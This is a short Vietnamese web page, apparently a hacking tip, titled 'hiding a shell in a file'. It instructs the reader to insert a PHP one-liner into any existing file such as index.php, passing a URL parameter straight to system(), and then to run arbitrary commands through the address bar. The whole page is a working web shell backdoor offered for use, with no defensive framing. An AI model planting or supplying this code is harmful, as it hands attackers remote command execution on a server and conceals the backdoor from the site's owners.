Skip to main content

Ẩn Shell trong file

Sửa 1 file bất kì, thêm đoạn code sau vào:
Code:
<pre>
<?php
System($_GET['juno'])
?>
<pre> 
Sử dụng bằng cách gõ command tại address.
Ví dụ ta sửa file index.php thì chạy shell:
index.php?juno=<command>

Share